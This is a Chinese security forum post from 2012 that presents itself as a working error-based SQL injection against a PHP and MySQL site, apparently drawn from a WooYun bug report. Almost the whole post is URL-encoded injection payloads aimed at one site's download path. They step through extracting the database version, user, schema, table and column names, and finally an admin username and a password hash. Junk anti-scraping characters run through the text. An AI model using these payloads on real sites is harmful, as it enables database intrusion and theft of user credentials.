找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2318|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666: q1 h& O/ @  i% i" c9 X
8 b/ s9 T  z. F( y
之前想找个测试 没想到这有 可以测试下做个记录而已 / A: e4 n9 |; w: C" A

4 c1 s0 X* b8 K/ g2 ohttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
- C% G3 R, Z1 ?, x) ]% b2 T' T4 D, A
/data0/htdocs/leqi_new/app/myapp.php& q2 z' }$ o3 {% @, V

2 s4 V" n8 @3 \5 ^% I) S 或者; G; d# M# b2 H- {
" e0 c& j, ^6 u1 s
/**********version()**********/ 5.1.49-log$ c& \( ^: V. e: b! r' J  j
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 \" W& B1 A  W$ e" {& b- J  S, r) X

/ J) p% Z! M& i& |/ z* e" [/**********user()**********/  
) Y- I5 K, Q9 V3 y- E) o' {http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 @7 ?- u. ?1 D" Z+ ]3 p& y; f" e# x: C( `+ R2 R
/**********database()**********/  leqi1 R% V- c7 U7 p- o1 B7 A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 X: ?: v& y: p8 L( s2 H
2 V2 z1 U% e' f: }) s7 `6 c/**********limit依次递归爆库**********/" V& H7 w3 ^( e! ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
  [: H- F* J0 L) O, R2 q0 linformation_schema# y. u3 F7 o( r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 j& L5 o, D& Z+ u( J* d) uleqi( L! w( D1 w) z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 L9 w: ~$ l. F5 C+ m! I2 [
test
) y  M9 s' ^9 q5 S3 Y# N
' ?6 Z9 |" N  `" q- H/**********limit依次递归爆表名**********/( f: s9 g: ~, J; u5 F: f; F/ o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 Q  a5 Q* x" p  lusers
" k5 p) {/ }* c" I
! j: S4 o' o9 D, @. c" o* q0 A/**********limit依次递归爆字段名**********/
$ n6 `# k! Z! q4 r% l$ thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! N7 S' r; ?% a+ huser_id,username,nickname,passwd,group_id
) A' d* A/ u1 s: B- hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/ a' I/ M; q1 O/wapc/5000_0005_0033 _) [8 J! ?! J# L) A7 S
11 21+ y4 V" n+ V% q$ J) y/ t& {
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23, s' Q9 ^1 a4 T, r
/wapc/5000_0005_003
. W# u& T5 `! `' \  X: @11 341 351 361
' ~2 Z. y! m8 \$ k$ H0 g: ^/**********爆数据**********/0 f/ @7 Q3 X" {1 _* ]' N% L9 [
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 I# o7 E2 l6 f3 s, d2 u3 n/ ^
admin2 o! @% ]- \# t" m% b8 @" _
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23: Q5 Z* |( U" u1 k, E: W0 H
6a8b4574ca231eb8bd52764d4978ffcd# a. i3 @$ k! t$ S# q- m

4 s3 V( X8 L# `! @2 W# _# r 4 p3 c, b) H& L* I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表